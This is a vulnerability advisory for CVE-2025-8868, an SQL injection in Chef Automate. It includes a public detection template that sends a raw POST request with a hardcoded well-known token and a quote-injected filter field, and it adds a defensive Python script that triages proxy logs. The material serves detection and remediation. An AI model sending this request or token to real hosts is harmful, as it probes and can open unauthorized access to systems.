In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.
PoC code [public]
id: CVE-2025-8868

info:
  name: Chef Automate < 4.13.295 — SQL Injection
  author: 3th1c_yuk1,xbow
  severity: critical
  description: |
    In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.
  remediation: |
    Upgrade to version 4.13.295 or later.
  reference:
    - https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8868
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-8868
    epss-score: 0.10513
    epss-percentile: 0.92936
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Chef Automate"
  tags: cve,cve2025,chef,automate,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /api/v0/compliance/profiles/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

        {"filters": [{"type": "name'", "values": ["test"]}]}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 500"
          - "contains(body, 'pq: syntax error')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 490a004630440220698958648d0a4899f549d28eea2026120e8231a4d7e713e92b8f0b57fbf22acb0220449a6e1c7841465842757eeeaa9f03142763a4124f491d48b5e44f41d78eda96:922c64590222798bb761d5b6d8e72950
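
For defenders reviewing proxy or gateway logs on instances not yet upgraded, the following added example (not part of the template above and not Chef Automate code) flags requests to the compliance profile search endpoint whose filter `type` is not a plain identifier, or whose response leaks a PostgreSQL syntax error. The log record field names and the identifier pattern are assumptions; the sample records are constructed.

```python
import json
import re

ENDPOINT = "/api/v0/compliance/profiles/search"
# Assumption: legitimate filter types are short plain identifiers.
SAFE_TYPE = re.compile(r"[A-Za-z0-9_.:-]{1,64}")


def bad_filter_types(body):
    """Return filter 'type' values in a search request body that are not plain identifiers."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []
    filters = doc.get("filters") if isinstance(doc, dict) else None
    if not isinstance(filters, list):
        return []
    bad = []
    for f in filters:
        t = f.get("type") if isinstance(f, dict) else None
        if t is not None and not (isinstance(t, str) and SAFE_TYPE.fullmatch(t)):
            bad.append(t)
    return bad


def triage(record):
    """Return the reasons a logged request/response pair deserves review (empty if none)."""
    if record.get("method") != "POST" or record.get("path", "").split("?")[0] != ENDPOINT:
        return []
    reasons = []
    bad = bad_filter_types(record.get("request_body", ""))
    if bad:
        reasons.append("non-identifier filter type: " + ", ".join(repr(b) for b in bad))
    if record.get("status") == 500 and "pq: syntax error" in record.get("response_body", ""):
        reasons.append("PostgreSQL syntax error returned to client")
    return reasons


# Constructed sample records in a hypothetical proxy log schema, not real traffic.
SAMPLE = [
    {"method": "POST", "path": ENDPOINT, "status": 200, "response_body": '{"profiles": []}',
     "request_body": '{"filters": [{"type": "name", "values": ["linux"]}]}'},
    {"method": "POST", "path": ENDPOINT, "status": 500, "response_body": '{"error": "pq: syntax error"}',
     "request_body": '{"filters": [{"type": "name\'", "values": ["test"]}]}'},
]

if __name__ == "__main__":
    for rec in SAMPLE:
        print(rec["status"], triage(rec))
```

Any hit on an instance older than 4.13.295 is a reason to upgrade first and then review the compliance service's database activity for the same time window.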